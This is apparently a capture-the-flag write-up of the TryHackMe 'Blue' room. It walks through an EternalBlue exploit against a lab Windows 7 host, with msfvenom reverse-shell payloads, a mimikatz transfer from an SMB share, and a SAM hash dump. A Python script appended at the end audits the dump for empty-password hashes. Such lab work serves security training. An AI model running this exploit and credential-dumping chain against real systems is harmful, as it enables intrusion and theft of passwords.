
TryHackMe: Blue


As the title and image of the room suggest, the target is probably vulnerable to EternalBlue (MS17-010, CVE-2017-0143). So let's start by downloading a tool that exploits that vulnerability:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

The repository also includes a script that checks whether the target is vulnerable, so run that first:

root@docker-desktop:~/Downloads/AutoBlue-MS17-010# python eternal_checker.py 10.10.49.80
[*] Target OS: Windows 7 Professional 7601 Service Pack 1
[!] The target is not patched
=== Testing named pipes ===
[*] Done

Once we know the target is vulnerable, let's build the shellcode payload:

root@docker-desktop:~/Downloads/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
<YOUR-IP>
LPORT you want x64 to listen on:
6464
LPORT you want x86 to listen on:
3232
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=<YOUR-IP> LPORT=6464
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=<YOUR-IP> LPORT=3232
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

Since we don't know the target's architecture, both payloads were generated and netcat listeners were started on ports 3232 and 6464.
Then the exploit was launched, which ended up giving a shell on the x64 port:

root@docker-desktop:~/Downloads/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.49.80 ./shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

Keep in mind that this exploit may not work on the first attempt; re-run it if no connection comes back.

To dump the stored password hashes we use mimikatz. First start smbserver.py (from Impacket) on our machine to transfer the binary:

root@docker-desktop:/tmp/x64# smbserver.py shared .

Then copy the binary from the share onto the victim:

C:\Users\Public\Downloads>copy \\<YOUR-IP>\shared\mimikatz.exe .
copy \\<YOUR-IP>\shared\mimikatz.exe .
        1 file(s) copied.

Finally, run mimikatz and dump the local SAM hashes:

C:\Users\Public\Downloads>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Jul 15 2020 16:10:52
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::sam
Domain : JON-PC
SysKey : 55bd17830e678f18a3110daf2c17d4c7
Local SID : S-1-5-21-2633577515-2458672280-487782642

SAMKey : c74ee832c5b6f4030dbbc7b51a011b1e

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0

RID  : 000001f5 (501)
User : Guest

RID  : 000003e8 (1000)
User : Jon
  Hash NTLM: ffb43f0de35be4d9917ac0cc8ad57f8d
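As an added example (not part of the original writeup), a small audit script that parses lsadump::sam output like the above and flags accounts whose stored NT hash is the hash of the empty password (the Administrator hash shown is exactly that value) or that have no NT hash stored at all. It carries its own MD4, since hashlib's md4 is frequently disabled under OpenSSL 3; the sample input is constructed from the dump above.

```python
import re
import struct
# Constructed sample in the lsadump::sam output format shown above.
SAM_DUMP = """\
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID  : 000001f5 (501)
User : Guest
RID  : 000003e8 (1000)
User : Jon
  Hash NTLM: ffb43f0de35be4d9917ac0cc8ad57f8d
"""
MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda v, s: ((v << s) | (v >> (32 - s))) & MASK
    # Per round: boolean function, additive constant, shift pattern, message word order.
    rounds = ((F, 0, (3, 7, 11, 19), range(16)),
              (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
              (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)))
    # Pad to 56 mod 64 bytes, then append the message bit length little-endian.
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                t = (a + fn(b, c, d) + X[k] + const) & MASK
                a, b, c, d = d, rotl(t, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16-le")).hex()

def parse_sam_dump(text: str) -> dict:
    """Map user name -> NT hash, or None when mimikatz printed no 'Hash NTLM' line."""
    users, current = {}, None
    for line in text.splitlines():
        if m := re.match(r"User\s*:\s*(\S+)", line):
            current = m.group(1); users[current] = None
        elif (m := re.search(r"Hash NTLM:\s*([0-9a-f]{32})", line)) and current:
            users[current] = m.group(1)
    return users

def audit(text: str) -> dict:
    empty = nt_hash("")  # empty-password NT hash: 31d6cfe0d16ae931b73c59d7e0c089c0
    return {u: "no-hash" if h is None else "empty-password" if h == empty else "hash-set" for u, h in parse_sam_dump(text).items()}
```

Against the dump above this reports Administrator as empty-password, Guest as no-hash and Jon as hash-set, which is the kind of finding an account audit should surface long before an attacker does.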

To crack the hash I used CrackStation.

Finally, we can simply locate the flags:

C:\>dir /s /b flag*
dir /s /b flag*
C:\flag1.txt
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk
C:\Users\Jon\Documents\flag3.txt
C:\Windows\System32\config\flag2.txt
WRITTEN BY
ITasahobby